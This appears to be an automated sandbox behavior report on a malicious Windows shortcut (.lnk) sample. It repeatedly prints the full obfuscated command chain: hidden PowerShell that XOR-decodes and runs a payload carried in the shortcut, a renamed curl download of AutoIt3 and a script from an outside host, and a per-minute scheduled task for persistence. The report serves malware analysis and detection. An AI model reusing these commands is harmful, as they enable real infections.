Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;

Language, Device and Operating System Detection

Yara detected Obfuscated Powershell

Source: Yara match

File source: knfV5IVjEV.lnk, type: SAMPLE

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
